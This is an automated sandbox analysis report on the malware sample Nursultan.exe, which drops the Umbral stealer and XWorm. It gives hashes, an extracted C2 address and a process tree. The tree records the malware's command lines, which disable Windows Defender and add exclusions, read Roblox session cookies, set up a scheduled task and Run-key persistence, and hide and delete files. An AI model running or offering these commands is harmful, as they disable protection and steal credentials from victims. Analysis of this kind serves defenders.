Analysis
-
max time kernel
124s -
max time network
130s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-06-2024 15:02
Static task
static1
Behavioral task
behavioral1
Sample
Nursultan.exe
Resource
win10v2004-20240508-en
General
-
Target
Nursultan.exe
-
Size
19.8MB
-
MD5
4aa0a579b602bd4434e6c857294fcca5
-
SHA1
3b4fec5946e430c54ec4b9170b165c9893368c1b
-
SHA256
13dcf8833f9fe533311420d9db085b180aca2ff1674e692c79b6596ebf5a83cd
-
SHA512
58fc656496033afdeda99efb2d9576fcc46e4b8af96ed0d024dc13b1fd775a98dad74d53f917c0e63980129221ecd686a8e178a86da423fadaac0761d50eff4a
-
SSDEEP
393216:kTspQo6f651rlw2PbRAInE5xg2N0hS+cpEMqT96SDtwdM7d3dgB7bSu8bafx3:kQuo6kBbeIACkAaE6k4MwBau8ix
Malware Config
Extracted
xworm
north-modem.gl.at.ply.gg:45517
-
Install_directory
%AppData%
-
install_file
Antimalware Service Executable.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000002a954-17.dat family_umbral behavioral2/memory/4552-25-0x00000216065A0000-0x00000216065E0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000002a99e-42.dat family_xworm behavioral2/memory/1884-53-0x00000000008E0000-0x00000000008F6000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2948 powershell.exe 3400 powershell.exe 3444 powershell.exe 4392 powershell.exe 1444 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Stealeerrrl.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.lnk sdfc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.lnk sdfc.exe -
Executes dropped EXE 30 IoCs
pid Process 3012 SHACTUAL.exe 4552 Stealeerrrl.exe 1228 Nursultan.exe 1884 sdfc.exe 972 45215434532.exe 2208 Nursultan.exe 2412 Stealeerrrl.exe 2148 45215434532.exe 3096 Nursultan.exe 2704 Stealeerrrl.exe 424 45215434532.exe 2012 Nursultan.exe 1716 Stealeerrrl.exe 2144 45215434532.exe 416 Nursultan.exe 1404 Stealeerrrl.exe 4852 45215434532.exe 1188 Nursultan.exe 3508 Stealeerrrl.exe 4660 45215434532.exe 4368 Nursultan.exe 3764 Stealeerrrl.exe 1436 45215434532.exe 4028 Nursultan.exe 2600 Stealeerrrl.exe 4452 45215434532.exe 2288 Nursultan.exe 1140 Stealeerrrl.exe 1940 Antimalware Service Executable.exe 2380 Antimalware Service Executable.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antimalware Service Executable = "C:\\Users\\Admin\\AppData\\Roaming\\Antimalware Service Executable.exe" sdfc.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 2 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2688 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3596 wmic.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings taskmgr.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4324 PING.EXE -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 4552 Stealeerrrl.exe 2948 powershell.exe 2948 powershell.exe 3400 powershell.exe 3400 powershell.exe 2812 powershell.exe 2812 powershell.exe 3444 powershell.exe 3444 powershell.exe 4392 powershell.exe 1812 powershell.exe 4392 powershell.exe 1812 powershell.exe 1444 powershell.exe 1444 powershell.exe 2956 powershell.exe 2956 powershell.exe 984 powershell.exe 984 powershell.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4552 Stealeerrrl.exe Token: SeDebugPrivilege 1884 sdfc.exe Token: SeIncreaseQuotaPrivilege 3956 wmic.exe Token: SeSecurityPrivilege 3956 wmic.exe Token: SeTakeOwnershipPrivilege 3956 wmic.exe Token: SeLoadDriverPrivilege 3956 wmic.exe Token: SeSystemProfilePrivilege 3956 wmic.exe Token: SeSystemtimePrivilege 3956 wmic.exe Token: SeProfSingleProcessPrivilege 3956 wmic.exe Token: SeIncBasePriorityPrivilege 3956 wmic.exe Token: SeCreatePagefilePrivilege 3956 wmic.exe Token: SeBackupPrivilege 3956 wmic.exe Token: SeRestorePrivilege 3956 wmic.exe Token: SeShutdownPrivilege 3956 wmic.exe Token: SeDebugPrivilege 3956 wmic.exe Token: SeSystemEnvironmentPrivilege 3956 wmic.exe Token: SeRemoteShutdownPrivilege 3956 wmic.exe Token: SeUndockPrivilege 3956 wmic.exe Token: SeManageVolumePrivilege 3956 wmic.exe Token: 33 3956 wmic.exe Token: 34 3956 wmic.exe Token: 35 3956 wmic.exe Token: 36 3956 wmic.exe Token: SeIncreaseQuotaPrivilege 3956 wmic.exe Token: SeSecurityPrivilege 3956 wmic.exe Token: SeTakeOwnershipPrivilege 3956 wmic.exe Token: SeLoadDriverPrivilege 3956 wmic.exe Token: SeSystemProfilePrivilege 3956 wmic.exe Token: SeSystemtimePrivilege 3956 wmic.exe Token: SeProfSingleProcessPrivilege 3956 wmic.exe Token: SeIncBasePriorityPrivilege 3956 wmic.exe Token: SeCreatePagefilePrivilege 3956 wmic.exe Token: SeBackupPrivilege 3956 wmic.exe Token: SeRestorePrivilege 3956 wmic.exe Token: SeShutdownPrivilege 3956 wmic.exe Token: SeDebugPrivilege 3956 wmic.exe Token: SeSystemEnvironmentPrivilege 3956 wmic.exe Token: SeRemoteShutdownPrivilege 3956 wmic.exe Token: SeUndockPrivilege 3956 wmic.exe Token: SeManageVolumePrivilege 3956 wmic.exe Token: 33 3956 wmic.exe Token: 34 3956 wmic.exe Token: 35 3956 wmic.exe Token: 36 3956 wmic.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeIncreaseQuotaPrivilege 4976 wmic.exe Token: SeSecurityPrivilege 4976 wmic.exe Token: SeTakeOwnershipPrivilege 4976 wmic.exe Token: SeLoadDriverPrivilege 4976 wmic.exe Token: SeSystemProfilePrivilege 4976 wmic.exe Token: SeSystemtimePrivilege 4976 wmic.exe Token: SeProfSingleProcessPrivilege 4976 wmic.exe Token: SeIncBasePriorityPrivilege 4976 wmic.exe Token: SeCreatePagefilePrivilege 4976 wmic.exe Token: SeBackupPrivilege 4976 wmic.exe Token: SeRestorePrivilege 4976 wmic.exe Token: SeShutdownPrivilege 4976 wmic.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
pid Process 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe -
Suspicious use of SendNotifyMessage 47 IoCs
pid Process 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe 3948 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2216 wrote to memory of 3012 2216 Nursultan.exe 78 PID 2216 wrote to memory of 3012 2216 Nursultan.exe 78 PID 2216 wrote to memory of 4552 2216 Nursultan.exe 79 PID 2216 wrote to memory of 4552 2216 Nursultan.exe 79 PID 2216 wrote to memory of 1228 2216 Nursultan.exe 81 PID 2216 wrote to memory of 1228 2216 Nursultan.exe 81 PID 2216 wrote to memory of 1884 2216 Nursultan.exe 82 PID 2216 wrote to memory of 1884 2216 Nursultan.exe 82 PID 1228 wrote to memory of 972 1228 Nursultan.exe 83 PID 1228 wrote to memory of 972 1228 Nursultan.exe 83 PID 1228 wrote to memory of 2208 1228 Nursultan.exe 84 PID 1228 wrote to memory of 2208 1228 Nursultan.exe 84 PID 1228 wrote to memory of 2412 1228 Nursultan.exe 85 PID 1228 wrote to memory of 2412 1228 Nursultan.exe 85 PID 2208 wrote to memory of 2148 2208 Nursultan.exe 86 PID 2208 wrote to memory of 2148 2208 Nursultan.exe 86 PID 2208 wrote to memory of 3096 2208 Nursultan.exe 87 PID 2208 wrote to memory of 3096 2208 Nursultan.exe 87 PID 2208 wrote to memory of 2704 2208 Nursultan.exe 88 PID 2208 wrote to memory of 2704 2208 Nursultan.exe 88 PID 4552 wrote to memory of 3956 4552 Stealeerrrl.exe 89 PID 4552 wrote to memory of 3956 4552 Stealeerrrl.exe 89 PID 3096 wrote to memory of 424 3096 Nursultan.exe 91 PID 3096 wrote to memory of 424 3096 Nursultan.exe 91 PID 3096 wrote to memory of 2012 3096 Nursultan.exe 92 PID 3096 wrote to memory of 2012 3096 Nursultan.exe 92 PID 3096 wrote to memory of 1716 3096 Nursultan.exe 93 PID 3096 wrote to memory of 1716 3096 Nursultan.exe 93 PID 2012 wrote to memory of 2144 2012 Nursultan.exe 94 PID 2012 wrote to memory of 2144 2012 Nursultan.exe 94 PID 2012 wrote to memory of 416 2012 Nursultan.exe 95 PID 2012 wrote to memory of 416 2012 Nursultan.exe 95 PID 2012 wrote to memory of 1404 2012 Nursultan.exe 96 PID 2012 wrote to memory of 1404 2012 Nursultan.exe 96 PID 416 wrote to memory of 4852 416 Nursultan.exe 97 PID 416 wrote to memory of 4852 416 Nursultan.exe 97 PID 4552 wrote to memory of 3056 4552 Stealeerrrl.exe 98 PID 4552 wrote to memory of 3056 4552 Stealeerrrl.exe 98 PID 4552 wrote to memory of 2948 4552 Stealeerrrl.exe 128 PID 4552 wrote to memory of 2948 4552 Stealeerrrl.exe 128 PID 416 wrote to memory of 1188 416 Nursultan.exe 102 PID 416 wrote to memory of 1188 416 Nursultan.exe 102 PID 416 wrote to memory of 3508 416 Nursultan.exe 103 PID 416 wrote to memory of 3508 416 Nursultan.exe 103 PID 1188 wrote to memory of 4660 1188 Nursultan.exe 104 PID 1188 wrote to memory of 4660 1188 Nursultan.exe 104 PID 1884 wrote to memory of 3400 1884 sdfc.exe 105 PID 1884 wrote to memory of 3400 1884 sdfc.exe 105 PID 1188 wrote to memory of 4368 1188 Nursultan.exe 107 PID 1188 wrote to memory of 4368 1188 Nursultan.exe 107 PID 1188 wrote to memory of 3764 1188 Nursultan.exe 108 PID 1188 wrote to memory of 3764 1188 Nursultan.exe 108 PID 4552 wrote to memory of 2812 4552 Stealeerrrl.exe 109 PID 4552 wrote to memory of 2812 4552 Stealeerrrl.exe 109 PID 4368 wrote to memory of 1436 4368 Nursultan.exe 111 PID 4368 wrote to memory of 1436 4368 Nursultan.exe 111 PID 1884 wrote to memory of 3444 1884 sdfc.exe 112 PID 1884 wrote to memory of 3444 1884 sdfc.exe 112 PID 4368 wrote to memory of 4028 4368 Nursultan.exe 113 PID 4368 wrote to memory of 4028 4368 Nursultan.exe 113 PID 4368 wrote to memory of 2600 4368 Nursultan.exe 115 PID 4368 wrote to memory of 2600 4368 Nursultan.exe 115 PID 4028 wrote to memory of 4452 4028 Nursultan.exe 116 PID 4028 wrote to memory of 4452 4028 Nursultan.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3056 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Roaming\SHACTUAL.exe"C:\Users\Admin\AppData\Roaming\SHACTUAL.exe"2⤵
- Executes dropped EXE
PID:3012
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"3⤵
- Views/modifies file attributes
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3596
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe" && pause3⤵PID:1680
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4324
-
-
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"3⤵
- Executes dropped EXE
PID:972
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"4⤵
- Executes dropped EXE
PID:2148
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"5⤵
- Executes dropped EXE
PID:424
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"6⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"7⤵
- Executes dropped EXE
PID:4852
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"8⤵
- Executes dropped EXE
PID:4660
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"9⤵
- Executes dropped EXE
PID:1436
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Roaming\45215434532.exe"C:\Users\Admin\AppData\Roaming\45215434532.exe"10⤵
- Executes dropped EXE
PID:4452
-
-
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"10⤵
- Executes dropped EXE
PID:2288
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"10⤵
- Executes dropped EXE
PID:1140
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"9⤵
- Executes dropped EXE
PID:2600
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"8⤵
- Executes dropped EXE
PID:3764
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"7⤵
- Executes dropped EXE
PID:3508
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"6⤵
- Executes dropped EXE
PID:1404
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"5⤵
- Executes dropped EXE
PID:1716
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"4⤵
- Executes dropped EXE
PID:2704
-
-
-
C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"C:\Users\Admin\AppData\Roaming\Stealeerrrl.exe"3⤵
- Executes dropped EXE
PID:2412
-
-
-
C:\Users\Admin\AppData\Roaming\sdfc.exe"C:\Users\Admin\AppData\Roaming\sdfc.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\sdfc.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sdfc.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Antimalware Service Executable.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Antimalware Service Executable" /tr "C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"3⤵
- Creates scheduled task(s)
PID:2688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2948
-
-
-
-
C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"1⤵
- Executes dropped EXE
PID:1940
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3948
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1944
-
C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Antimalware Service Executable.exe"1⤵
- Executes dropped EXE
PID:2380
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
871B
MD5bc4e798e428bf600621ffa361da29e88
SHA160c6bbe3f8dd34346f4b917d540bf23d7e388d0c
SHA256e581886635b44fab5f83b1267283d3718cfd5b1663c888bd43723d3735d13d61
SHA512f311add74aea7f96f9face313710328846f49131c97568ee556bd31447036c29c08e6953394fe8dcb0fc072bb19dcb6e72dcf26c0519cec26056da0e869127c9
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
1KB
MD5b51beb4423c86427f672916554030c47
SHA19b97736d8434b62ef627a4ee8484e26c719924a8
SHA256df796564c34fb36085aa25452d44ead56fba39aa18e80cb4ba1c30becca0dfea
SHA512262fc9e9cddee9ae3c733bb961f44f27628783961db101aabc868765ba0e2aafdcb8f9b689f1abd4613836ed9cf3064e92cbd10495c83fe04dd2a496db3485d9
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD5d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA25621942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA5121a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD54a7f03a7ad1cae046d8ceac04256e5ae
SHA1ef0bf767c91cba32b33c0b48f74f5eb153ae43d3
SHA256e8aa3162f519e3670b0fc79dfbeeca68ea2b65a17900cf3aafc6a48de3296d60
SHA512382a91848be121734bce9f533bcb4747e5f21db5b1ea5dfc8cc567005f5be0f1dcc73a55516b83feb931cdc90601ed4d36fb890687f08e1056ff98da2365f01d
-
Filesize
944B
